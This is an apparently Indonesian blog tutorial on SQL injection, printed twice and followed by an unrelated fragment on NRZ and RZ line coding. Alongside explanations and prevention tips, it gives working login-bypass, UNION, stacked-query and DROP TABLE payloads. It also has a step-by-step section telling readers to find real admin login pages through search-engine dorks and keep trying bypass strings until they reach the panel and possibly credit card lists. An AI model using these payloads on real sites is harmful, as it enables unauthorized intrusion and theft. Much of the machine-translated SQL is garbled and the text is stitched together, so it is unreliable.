PENGERTIAN
SQL injection adalah teknik injeksi kode yang mengeksploitasi kerentanan keamanan yang terjadi pada lapisan aplikasi database. Kerentanan ini hadir ketika masukan pengguna baik salah disaring untuk lolos karakter string literal tertanam dalam pernyataan SQL atau masukan pengguna tidak strongly typed dan dengan demikian tak terduga dieksekusi. Ini adalah sebuah instance dari kelas yang lebih umum dari kerentanan yang dapat terjadi kapan pun salah satu bahasa pemrograman atau scripting adalah tertanam dalam lainnya. Serangan injeksi SQL juga dikenal sebagai serangan penyisipan SQL.
1) SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.
2) SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Bentuk SQL injection terjadi ketika masukan pengguna tidak disaring untuk karakter melarikan diri dan kemudian dilewatkan ke dalam suatu pernyataan SQL. Hal ini menyebabkan potensi manipulasi laporan dilakukan pada database oleh pengguna-akhir aplikasi.
Baris kode berikut menggambarkan kerentanan ini:
Pernyataan = "SELECT * FROM` user `WHERE` name `= '" + username + "';" Kode SQL dirancang untuk menarik catatan username tertentu dari tabel pengguna. Namun, jika "username" variabel dibuat dengan cara tertentu oleh seorang pengguna jahat, pernyataan SQL dapat melakukan lebih dari penulis kode yang ditujukan. Sebagai contoh, pengaturan "username" variabel sebagai
'Atau '1' = '1
Atau menggunakan komentar untuk bahkan memblokir seluruh query:
'Atau '1' = '1';/*'
menjadikan pernyataan SQL ini oleh bahasa induk:
SELECT * FROM `user` WHERE `name` =''OR '1 '= '1';
Jika kode ini akan digunakan dalam sebuah prosedur otentikasi maka contoh ini dapat digunakan untuk memaksakan pemilihan sebuah nama pengguna yang sah karena evaluasi '1 '= '1' selalu benar.
Nilai berikut "username" dalam pernyataan di bawah ini akan menyebabkan penghapusan tabel "pengguna" serta pemilihan semua data dari tabel "userinfo" (pada intinya mengungkap informasi setiap pengguna), dengan menggunakan API yang memungkinkan beberapa pernyataan:
a '; DROP TABLE `pengguna`; SELECT * FROM `userinfo` WHERE' t t '='
Masukan ini membuat pernyataan akhir SQL sebagai berikut:
SELECT * FROM `user` WHERE `nama` 'a' =; DROP TABLE `pengguna`; SELECT * FROM `userinfo` 't' MANA
Sementara sebagian besar implementasi SQL server memungkinkan beberapa pernyataan akan dieksekusi dengan satu panggilan dengan cara ini, beberapa API SQL seperti PHP mysql_query (); fungsi tidak mengijinkan ini untuk alasan keamanan. Hal ini mencegah penyerang dari menyuntikkan query sepenuhnya terpisah, tetapi tidak menghentikan mereka dari memodifikasi query.
Salah Penanganan Jenis
Bentuk injeksi SQL terjadi ketika pengguna bidang yang disediakan tidak diketik kuat atau tidak diperiksa untuk jenis kendala. Hal ini bisa terjadi ketika bidang numerik akan digunakan dalam pernyataan SQL, tetapi pemrogram tidak membuat cek untuk memvalidasi bahwa pengguna disediakan input numerik. Sebagai contoh:
pernyataan: = "SELECT * FROM` userinfo `WHERE` id `=" + a_variable + ";"
Hal ini jelas dari pernyataan ini bahwa penulis dimaksudkan a_variable untuk menjadi nomor berhubungan ke kolom "id". Namun, jika itu sebenarnya sebuah string maka pengguna akhir dapat memanipulasi pernyataan sebagaimana mereka pilih, sehingga melewati kebutuhan untuk karakter melarikan diri. Misalnya, pengaturan a_variable: 1; DROP TABLE `pengguna`
akan drop (menghapus) "pengguna" tabel dari database, karena SQL akan diberikan sebagai berikut: SELECT * FROM `userinfo` WHERE `id` = 1; DROP TABLE `pengguna`;
Kerentanan dalam database server.
Kadang-kadang kerentanan dapat eksis dalam perangkat lunak server database itu sendiri, seperti yang terjadi dengan mysql_real_escape_string server MySQL () fungsi Hal ini akan memungkinkan penyerang untuk melakukan serangan SQL injection sukses berdasarkan karakter Unicode buruk bahkan jika input pengguna sedang melarikan diri. Bug ini telah ditambal dengan rilis versi 5.0.22 (dirilis pada tanggal 24 Mei.
Blind SQL injection. Blind SQL Injection digunakan ketika sebuah aplikasi web yang rentan terhadap injeksi SQL tetapi hasil suntikan tidak terlihat bagi penyerang. Halaman dengan kerentanan tidak mungkin menjadi salah satu yang menampilkan data tetapi akan ditampilkan berbeda tergantung pada hasil pernyataan logis disuntikkan ke pernyataan SQL yang sah disebut untuk halaman tersebut. Jenis serangan bisa menjadi waktu-intensif karena pernyataan baru harus dibuat untuk setiap bit pulih. Ada beberapa alat yang dapat mengotomatisasi serangan ini sekali lokasi kerentanan dan informasi target telah .
Tanggapan Bersyarat
Salah satu jenis SQL injection buta memaksa database untuk mengevaluasi pernyataan logis pada layar aplikasi biasa.
SELECT `booktitle` DARI `Booklist` WHERE `bookId` = 'OOk14cd' DAN '1 '= '1';
akan menghasilkan halaman yang normal sedangkan SELECT `booktitle` DARI `Booklist` WHERE `bookId` = 'OOk14cd' DAN '1 '= '2';
kemungkinan akan memberikan hasil yang berbeda jika halaman tersebut rentan terhadap SQL injection. Sebuah injeksi seperti ini mungkin menyarankan untuk penyerang bahwa SQL injection buta adalah mungkin, meninggalkan penyerang untuk merancang pernyataan yang mengevaluasi untuk benar atau salah tergantung pada isi kolom atau tabel lain di luar daftar kolom SELECT's
Kesalahan Bersyarat
SQL injection buta menyebabkan kesalahan SQL dengan memaksa database untuk mengevaluasi pernyataan yang menyebabkan kesalahan jika pernyataan WHERE adalah benar. Sebagai contoh, SELECT 1 / 0 DARI `user` WHERE `username` 'Ralph' =;
pembagian dengan nol hanya akan dievaluasi dan menyebabkan kesalahan jika pengguna Ralph ada.
Sisa Penundaan adalah jenis SQL injection buta yang menyebabkan mesin SQL untuk mengeksekusi query berjalan panjang atau penundaan waktu tergantung pada pernyataan logika disuntikkan. Penyerang kemudian dapat mengukur kali halaman yang dibutuhkan untuk beban untuk menentukan apakah pernyataan disuntikkan adalah benar
Mencegah SQL Injection.
Untuk melindungi terhadap injeksi SQL, masukan user tidak harus langsung dimasukkan dalam pernyataan SQL. Sebaliknya, pernyataan parameter harus digunakan (lebih disukai), atau input pengguna harus secara hati-hati melarikan diri atau disaring. Dengan platform pengembangan yang paling, laporan dapat digunakan parameter yang bekerja dengan parameter (penampung kadang-kadang disebut atau variabel mengikat) daripada embedding input pengguna dalam pernyataan itu. Dalam banyak kasus, pernyataan SQL adalah tetap, dan setiap parameter adalah skalar, bukan meja. Input pengguna kemudian ditugaskan (terikat) untuk parameter. Ini adalah contoh menggunakan Java dan API JDBC:
PreparedStatement prep = conn.prepareStatement ("SELECT * FROM` user `WHERE USERNAME = DAN PASSWORD? =?");
prep.setString (1, username); prep.setString (2, password);
prep.executeQuery ();
Saat ini hanya H2 Database Engine mendukung kemampuan untuk menegakkan parameterisasi query [5] Namun,. Satu kelemahan adalah bahwa query dengan contoh tidak mungkin atau tidak praktis karena sulit untuk menerapkan contoh query dengan menggunakan query parameter. Menggunakan perpustakaan object-relational mapping menghindari kebutuhan untuk menulis kode SQL. Perpustakaan ORM yang berlaku akan menghasilkan laporan parameterized SQL dari kode berorientasi obyek. A lurus ke depan, meskipun rawan kesalahan, cara untuk mencegah suntikan untuk melarikan diri karakter yang memiliki arti khusus dalam SQL. Manual untuk DBMS SQL yang menjelaskan karakter memiliki arti khusus, yang memungkinkan membuat daftar hitam yang komprehensif karakter yang perlu terjemahan. Sebagai contoh, setiap terjadinya kutip tunggal (') dalam parameter harus diganti dengan dua tanda kutip tunggal ('') untuk membentuk suatu string literal SQL yang valid. Dalam PHP, misalnya, biasanya untuk melarikan diri parameter menggunakan fungsi mysql_real_escape_string (); sebelum mengirim SQL query:
$ Query = sprintf ("SELECT * FROM` User `WHERE UserName DAN '% s' = Password '% s' =",
mysql_real_escape_string ($ Username),
mysql_real_escape_string ($ Password));
mysql_query ($ query);
Rutin melalui string melarikan diri ke SQL adalah kesalahan rawan karena mudah lupa untuk lolos dari string yang diberikan. Membuat lapisan transparan untuk mengamankan input dapat mengurangi kesalahan-wilayah rawan ini, jika tidak sepenuhnya menghilangkannya.
Sebab terjadinya SQL Injection
1) Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus -- yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
2) Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.
Bug SQL Injection berbahaya ?
1) Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account.
2) Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database.
3) Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.
Apa saja yang diperlukan untuk melakukan SQL Injection ?
1) Internet Exploler / Browser
2) PC yang terhubung internet
3) Program atau software seperti softice
Contoh sintaks SQL Injection
Contoh sintak SQL dalam PHP
1) $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
2) isikan password dengan string ’ or ’’ = ’
3) hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
4) maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL
Contoh sintaks SQL Injection
1) Sintaks SQL string ‘-- setelah nama username
2) Query database awal :
Berubah menjadi :
Penanganan SQL Injection
1) Merubah script php
2) Menggunakan MySQL_escape_string
3) Pemfilteran karakter ‘ dengan memodifikasi php.ini
Syntax SQL Injection
1. Commenting out.
Gunanya untuk mengakhiri suatu query, bypass query.
+ SQL Server
Syntax: –
Penggunaan: DROP namatabel;–
+ MySQL
Syntax: #
Penggunaan: DROP namatabel;#
Contoh penggunaan in real life:
* Username: admin’–
* Proses query yang terjadi di server:
SELECT * FROM userlist WHERE username=’admin’–’ AND password=’password’;
Query ini akan memberikan km akses sebagai admin karena query selanjutnya setelah — akan diabaikan
2. Inline comment
Gunanya untuk mengetahui versi SQL server yang digunakan atau untuk bypass script proteksi
+ SQL Server (MySQL juga bisa)
Syntax: /*Comment*/
Penggunaan: DROP/*comment*/namatabel
atau: DR/**/OP/*bypass proteksi*/namatabel
atau: SELECT/*menghindari-spasi*/password/**/FROM/**/userlist+ MySQL (mendeteksi versi)
Syntax: /*!MYSQL Special SQL*/
Penggunaan: SELECT /*!32302 1/0,*/1 FROM namatabel
Note: Syntax juga bisa digunakan jika versi MySQL lebih tinggi dari 3.23.02 (sesuai query), tidak berfungsi untuk versi dibawahnya
3. Staking queries
Gunanya untuk menyambung 2 buah query dalam 1 transaksi.
+ SQL Server
Syntax: ;
Penggunaan: SELECT * FROM namatabel; DROP namatabel–
4. Pernyataan IF
Ini kunci jika melakukan Blind SQL Injection, juga berguna untuk testing sesuatu yang ga jelas secara akurat
+ SQL Server
Syntax: IF kondisi bagian-true ELSE bagian-false
Penggunaan: IF (1=1) SELECT ‘true’ ELSE SELECT ‘false’+ MySQL
Syntax: IF(kondisi,bagian-true,bagian-false)
Penggunaan: SELECT IF(1=1,’true’,’false’)
5. Operasi String
Gunanya untuk bypass proteksi
+ SQL Server
Syntax: +
Penggunaan: SELECT login + ‘-’ + password FROM userlist+ MySQL Server
Syntax: ||
Penggunaan: SELECT login || ‘-’ || password FROM userlist
Note: Jika MySQL server dalam mode ANSI syntax berfunsi. Cara lain adalah dengan menggunakan fungsi CONCAT() dalam MySQL.
Syntax: CONCAT(str1,str2,str3,…)
Penggunaan: SELECT CONCAT(login,password) FROM userlist
6. Union Injection
Gunanya menggabungkan 2 tabel yang berbeda dengan syarat tabel itu harus sama jumlah kolomnya.
Syntax: UNION
Penggunaan: ‘ UNION SELECT * FROM namatabel
atau: ‘ UNION ALL SELECT * FROM namatabel
atau: ‘ UNION SELECT kolom1,kolom2 FROM namatabel
Proses yang terjadi dalam query:
SELECT * FROM user WHERE id=’1′ UNION SELECT kolom1,kolom2 FROM namatabel
Jika tabel tersebut mempunyai kolom yang berbeda, maka dapat ditambahkan null atau 1
Penggunaan: ‘ UNION SELECT 1,kolom1,kolom2 FROM namatabel
Implementasi SQL Injection
1) Masuk ke google atau browse yg lain
2) Masukkan salah satu keyword berikut
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
{anda bisa menambahi sendiri sesuai keinginan anda}
3) Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).
4) Masukkan kode berikut :
User name : ` or `a'='a
Password : ` or `a'='a (termasuk tanda petiknya)
5) Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
7) Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password : ` or `a'='a
atau bisa dimasukkan ke dua–duanya misal :
‘ or 0=0 -- ; “ or 0=0 -- ; or 0=0 -- ; ‘ or 0=0 # ;
“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x
8) Cobalah sampai berhasil hingga anda bisa masuk ke admin panel
Cara pencegahan SQL INJECTION
1) Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.
Hacking adalah seni. Hacking adalah perpaduan dari pengetahuan, kreatifitas dan kesabaran. Jika Anda memiliki ketiga-tiganya Anda akan berhasil.
DAFTAR PUSTAKA
http://en.wikipedia.org/wiki/SQL_injection
http://www.binushacker.net/simple-sql-injection-tutorial.html
BM-100, ”Hacking hiltonjakarta.com (SQL Injection)”, 24 Juli 2005, (http://www.jasakom.com).
PENGERTIAN
SQL injection adalah teknik injeksi kode yang mengeksploitasi kerentanan keamanan yang terjadi pada lapisan aplikasi database. Kerentanan ini hadir ketika masukan pengguna baik salah disaring untuk lolos karakter string literal tertanam dalam pernyataan SQL atau masukan pengguna tidak strongly typed dan dengan demikian tak terduga dieksekusi. Ini adalah sebuah instance dari kelas yang lebih umum dari kerentanan yang dapat terjadi kapan pun salah satu bahasa pemrograman atau scripting adalah tertanam dalam lainnya. Serangan injeksi SQL juga dikenal sebagai serangan penyisipan SQL.
1) SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.
2) SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Bentuk SQL injection terjadi ketika masukan pengguna tidak disaring untuk karakter melarikan diri dan kemudian dilewatkan ke dalam suatu pernyataan SQL. Hal ini menyebabkan potensi manipulasi laporan dilakukan pada database oleh pengguna-akhir aplikasi.
Baris kode berikut menggambarkan kerentanan ini:
Pernyataan = "SELECT * FROM` user `WHERE` name `= '" + username + "';" Kode SQL dirancang untuk menarik catatan username tertentu dari tabel pengguna. Namun, jika "username" variabel dibuat dengan cara tertentu oleh seorang pengguna jahat, pernyataan SQL dapat melakukan lebih dari penulis kode yang ditujukan. Sebagai contoh, pengaturan "username" variabel sebagai
'Atau '1' = '1
Atau menggunakan komentar untuk bahkan memblokir seluruh query:
'Atau '1' = '1';/*'
menjadikan pernyataan SQL ini oleh bahasa induk:
SELECT * FROM `user` WHERE `name` =''OR '1 '= '1';
Jika kode ini akan digunakan dalam sebuah prosedur otentikasi maka contoh ini dapat digunakan untuk memaksakan pemilihan sebuah nama pengguna yang sah karena evaluasi '1 '= '1' selalu benar.
Nilai berikut "username" dalam pernyataan di bawah ini akan menyebabkan penghapusan tabel "pengguna" serta pemilihan semua data dari tabel "userinfo" (pada intinya mengungkap informasi setiap pengguna), dengan menggunakan API yang memungkinkan beberapa pernyataan:
a '; DROP TABLE `pengguna`; SELECT * FROM `userinfo` WHERE' t t '='
Masukan ini membuat pernyataan akhir SQL sebagai berikut:
SELECT * FROM `user` WHERE `nama` 'a' =; DROP TABLE `pengguna`; SELECT * FROM `userinfo` 't' MANA
Sementara sebagian besar implementasi SQL server memungkinkan beberapa pernyataan akan dieksekusi dengan satu panggilan dengan cara ini, beberapa API SQL seperti PHP mysql_query (); fungsi tidak mengijinkan ini untuk alasan keamanan. Hal ini mencegah penyerang dari menyuntikkan query sepenuhnya terpisah, tetapi tidak menghentikan mereka dari memodifikasi query.
Salah Penanganan Jenis
Bentuk injeksi SQL terjadi ketika pengguna bidang yang disediakan tidak diketik kuat atau tidak diperiksa untuk jenis kendala. Hal ini bisa terjadi ketika bidang numerik akan digunakan dalam pernyataan SQL, tetapi pemrogram tidak membuat cek untuk memvalidasi bahwa pengguna disediakan input numerik. Sebagai contoh:
pernyataan: = "SELECT * FROM` userinfo `WHERE` id `=" + a_variable + ";"
Hal ini jelas dari pernyataan ini bahwa penulis dimaksudkan a_variable untuk menjadi nomor berhubungan ke kolom "id". Namun, jika itu sebenarnya sebuah string maka pengguna akhir dapat memanipulasi pernyataan sebagaimana mereka pilih, sehingga melewati kebutuhan untuk karakter melarikan diri. Misalnya, pengaturan a_variable: 1; DROP TABLE `pengguna`
akan drop (menghapus) "pengguna" tabel dari database, karena SQL akan diberikan sebagai berikut: SELECT * FROM `userinfo` WHERE `id` = 1; DROP TABLE `pengguna`;
Kerentanan dalam database server.
Kadang-kadang kerentanan dapat eksis dalam perangkat lunak server database itu sendiri, seperti yang terjadi dengan mysql_real_escape_string server MySQL () fungsi Hal ini akan memungkinkan penyerang untuk melakukan serangan SQL injection sukses berdasarkan karakter Unicode buruk bahkan jika input pengguna sedang melarikan diri. Bug ini telah ditambal dengan rilis versi 5.0.22 (dirilis pada tanggal 24 Mei.
Blind SQL injection. Blind SQL Injection digunakan ketika sebuah aplikasi web yang rentan terhadap injeksi SQL tetapi hasil suntikan tidak terlihat bagi penyerang. Halaman dengan kerentanan tidak mungkin menjadi salah satu yang menampilkan data tetapi akan ditampilkan berbeda tergantung pada hasil pernyataan logis disuntikkan ke pernyataan SQL yang sah disebut untuk halaman tersebut. Jenis serangan bisa menjadi waktu-intensif karena pernyataan baru harus dibuat untuk setiap bit pulih. Ada beberapa alat yang dapat mengotomatisasi serangan ini sekali lokasi kerentanan dan informasi target telah .
Tanggapan Bersyarat
Salah satu jenis SQL injection buta memaksa database untuk mengevaluasi pernyataan logis pada layar aplikasi biasa.
SELECT `booktitle` DARI `Booklist` WHERE `bookId` = 'OOk14cd' DAN '1 '= '1';
akan menghasilkan halaman yang normal sedangkan SELECT `booktitle` DARI `Booklist` WHERE `bookId` = 'OOk14cd' DAN '1 '= '2';
kemungkinan akan memberikan hasil yang berbeda jika halaman tersebut rentan terhadap SQL injection. Sebuah injeksi seperti ini mungkin menyarankan untuk penyerang bahwa SQL injection buta adalah mungkin, meninggalkan penyerang untuk merancang pernyataan yang mengevaluasi untuk benar atau salah tergantung pada isi kolom atau tabel lain di luar daftar kolom SELECT's
Kesalahan Bersyarat
SQL injection buta menyebabkan kesalahan SQL dengan memaksa database untuk mengevaluasi pernyataan yang menyebabkan kesalahan jika pernyataan WHERE adalah benar. Sebagai contoh, SELECT 1 / 0 DARI `user` WHERE `username` 'Ralph' =;
pembagian dengan nol hanya akan dievaluasi dan menyebabkan kesalahan jika pengguna Ralph ada.
Sisa Penundaan adalah jenis SQL injection buta yang menyebabkan mesin SQL untuk mengeksekusi query berjalan panjang atau penundaan waktu tergantung pada pernyataan logika disuntikkan. Penyerang kemudian dapat mengukur kali halaman yang dibutuhkan untuk beban untuk menentukan apakah pernyataan disuntikkan adalah benar
Mencegah SQL Injection.
Untuk melindungi terhadap injeksi SQL, masukan user tidak harus langsung dimasukkan dalam pernyataan SQL. Sebaliknya, pernyataan parameter harus digunakan (lebih disukai), atau input pengguna harus secara hati-hati melarikan diri atau disaring. Dengan platform pengembangan yang paling, laporan dapat digunakan parameter yang bekerja dengan parameter (penampung kadang-kadang disebut atau variabel mengikat) daripada embedding input pengguna dalam pernyataan itu. Dalam banyak kasus, pernyataan SQL adalah tetap, dan setiap parameter adalah skalar, bukan meja. Input pengguna kemudian ditugaskan (terikat) untuk parameter. Ini adalah contoh menggunakan Java dan API JDBC:
PreparedStatement prep = conn.prepareStatement ("SELECT * FROM` user `WHERE USERNAME = DAN PASSWORD? =?");
prep.setString (1, username); prep.setString (2, password);
prep.executeQuery ();
Saat ini hanya H2 Database Engine mendukung kemampuan untuk menegakkan parameterisasi query [5] Namun,. Satu kelemahan adalah bahwa query dengan contoh tidak mungkin atau tidak praktis karena sulit untuk menerapkan contoh query dengan menggunakan query parameter. Menggunakan perpustakaan object-relational mapping menghindari kebutuhan untuk menulis kode SQL. Perpustakaan ORM yang berlaku akan menghasilkan laporan parameterized SQL dari kode berorientasi obyek. A lurus ke depan, meskipun rawan kesalahan, cara untuk mencegah suntikan untuk melarikan diri karakter yang memiliki arti khusus dalam SQL. Manual untuk DBMS SQL yang menjelaskan karakter memiliki arti khusus, yang memungkinkan membuat daftar hitam yang komprehensif karakter yang perlu terjemahan. Sebagai contoh, setiap terjadinya kutip tunggal (') dalam parameter harus diganti dengan dua tanda kutip tunggal ('') untuk membentuk suatu string literal SQL yang valid. Dalam PHP, misalnya, biasanya untuk melarikan diri parameter menggunakan fungsi mysql_real_escape_string (); sebelum mengirim SQL query:
$ Query = sprintf ("SELECT * FROM` User `WHERE UserName DAN '% s' = Password '% s' =",
mysql_real_escape_string ($ Username),
mysql_real_escape_string ($ Password));
mysql_query ($ query);
Rutin melalui string melarikan diri ke SQL adalah kesalahan rawan karena mudah lupa untuk lolos dari string yang diberikan. Membuat lapisan transparan untuk mengamankan input dapat mengurangi kesalahan-wilayah rawan ini, jika tidak sepenuhnya menghilangkannya.
Sebab terjadinya SQL Injection
1) Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus -- yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
2) Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.
Bug SQL Injection berbahaya ?
1) Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account.
2) Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database.
3) Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.
Apa saja yang diperlukan untuk melakukan SQL Injection ?
1) Internet Exploler / Browser
2) PC yang terhubung internet
3) Program atau software seperti softice
Contoh sintaks SQL Injection
Contoh sintak SQL dalam PHP
1) $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
2) isikan password dengan string ’ or ’’ = ’
3) hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
4) maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL
Contoh sintaks SQL Injection
1) Sintaks SQL string ‘-- setelah nama username
2) Query database awal :
Berubah menjadi :
Penanganan SQL Injection
1) Merubah script php
2) Menggunakan MySQL_escape_string
3) Pemfilteran karakter ‘ dengan memodifikasi php.ini
Syntax SQL Injection
1. Commenting out.
Gunanya untuk mengakhiri suatu query, bypass query.
+ SQL Server
Syntax: –
Penggunaan: DROP namatabel;–
+ MySQL
Syntax: #
Penggunaan: DROP namatabel;#
Contoh penggunaan in real life:
* Username: admin’–
* Proses query yang terjadi di server:
SELECT * FROM userlist WHERE username=’admin’–’ AND password=’password’;
Query ini akan memberikan km akses sebagai admin karena query selanjutnya setelah — akan diabaikan
2. Inline comment
Gunanya untuk mengetahui versi SQL server yang digunakan atau untuk bypass script proteksi
+ SQL Server (MySQL juga bisa)
Syntax: /*Comment*/
Penggunaan: DROP/*comment*/namatabel
atau: DR/**/OP/*bypass proteksi*/namatabel
atau: SELECT/*menghindari-spasi*/password/**/FROM/**/userlist+ MySQL (mendeteksi versi)
Syntax: /*!MYSQL Special SQL*/
Penggunaan: SELECT /*!32302 1/0,*/1 FROM namatabel
Note: Syntax juga bisa digunakan jika versi MySQL lebih tinggi dari 3.23.02 (sesuai query), tidak berfungsi untuk versi dibawahnya
3. Staking queries
Gunanya untuk menyambung 2 buah query dalam 1 transaksi.
+ SQL Server
Syntax: ;
Penggunaan: SELECT * FROM namatabel; DROP namatabel–
4. Pernyataan IF
Ini kunci jika melakukan Blind SQL Injection, juga berguna untuk testing sesuatu yang ga jelas secara akurat
+ SQL Server
Syntax: IF kondisi bagian-true ELSE bagian-false
Penggunaan: IF (1=1) SELECT ‘true’ ELSE SELECT ‘false’+ MySQL
Syntax: IF(kondisi,bagian-true,bagian-false)
Penggunaan: SELECT IF(1=1,’true’,’false’)
5. Operasi String
Gunanya untuk bypass proteksi
+ SQL Server
Syntax: +
Penggunaan: SELECT login + ‘-’ + password FROM userlist+ MySQL Server
Syntax: ||
Penggunaan: SELECT login || ‘-’ || password FROM userlist
Note: Jika MySQL server dalam mode ANSI syntax berfunsi. Cara lain adalah dengan menggunakan fungsi CONCAT() dalam MySQL.
Syntax: CONCAT(str1,str2,str3,…)
Penggunaan: SELECT CONCAT(login,password) FROM userlist
6. Union Injection
Gunanya menggabungkan 2 tabel yang berbeda dengan syarat tabel itu harus sama jumlah kolomnya.
Syntax: UNION
Penggunaan: ‘ UNION SELECT * FROM namatabel
atau: ‘ UNION ALL SELECT * FROM namatabel
atau: ‘ UNION SELECT kolom1,kolom2 FROM namatabel
Proses yang terjadi dalam query:
SELECT * FROM user WHERE id=’1′ UNION SELECT kolom1,kolom2 FROM namatabel
Jika tabel tersebut mempunyai kolom yang berbeda, maka dapat ditambahkan null atau 1
Penggunaan: ‘ UNION SELECT 1,kolom1,kolom2 FROM namatabel
Implementasi SQL Injection
1) Masuk ke google atau browse yg lain
2) Masukkan salah satu keyword berikut
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
{anda bisa menambahi sendiri sesuai keinginan anda}
3) Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).
4) Masukkan kode berikut :
User name : ` or `a'='a
Password : ` or `a'='a (termasuk tanda petiknya)
5) Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,
dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
7) Banyak variasi kode yang mungkin, antara lain :
User name : admin
Password : ` or `a'='a
atau bisa dimasukkan ke dua–duanya misal :
‘ or 0=0 -- ; “ or 0=0 -- ; or 0=0 -- ; ‘ or 0=0 # ;
“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x
8) Cobalah sampai berhasil hingga anda bisa masuk ke admin panel
Cara pencegahan SQL INJECTION
1) Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.
Hacking adalah seni. Hacking adalah perpaduan dari pengetahuan, kreatifitas dan kesabaran. Jika Anda memiliki ketiga-tiganya Anda akan berhasil.
DAFTAR PUSTAKA
http://en.wikipedia.org/wiki/SQL_injection
http://www.binushacker.net/simple-sql-injection-tutorial.html
BM-100, ”Hacking hiltonjakarta.com (SQL Injection)”, 24 Juli 2005, (http://www.jasakom.com).
A. Non Return to Zero (NRZ)
Non Return-to-Zero-Level (NRZ-L) yaitu suatu kode dimana tegangan negative dipakai untuk mewakili suatu binary dan tegangan positif dipakai untuk mewakili binary lainnya. NRZ mempunyai sifat level tegangan tetap selama interval bit tak ada transisi.
Jenis-jenisnya:
1. Non Return to Zero - Level (NRZ-L).
Secara umum adalah kode yang digunakan untuk menghasilkan dan menginterpretasikan data digital oleh terminal pemroses data/peralatan lainnya.
1 = level tinggi (ada pulsa).
0 = level rendah (tidak ada pulsa).
2. Non Return to Zero - Mark (NRZ-M).
Punya keuntungan dalam pengkodean differensial, dimana sinyal dikodekan dengan membandingkan polaritas elemen sinyal yang berdekatan dari harga absolut sinyal. Keuntungan pengkodean differensial lebih mudah mendekati transisi noise.
1 = ada transisi diawal interval bit.
0 = tidak ada transisi.
3. Nonreturn to Zero - Space (NRZ-S).
Hampir sama dengan NRZ-M.
1 = tidak ada transisi.
0 = ada transisi diawal interval bit.
B. Return to Zero (RZ)
Return to Zero Seperti pada NRZ dimana signal positif menyatakan bit ”1” dan negatif menyatakan bit ”0”, tetapi signal tersebut baik yang positif maupun yang negatif akan kembali ke posisi netral ”nol”, ditengah durasi waktu bit. Transisi signal ditengah durasi waktu bit ini dipakai untuk sinkronisasi. Kelemahan sistem ini adalah diperlukan 2 signal yang berubah baik bit ”1” maupun bit ”0” ditengah interval sehingga mengakibatkan bandwidth akan bertambah besar.
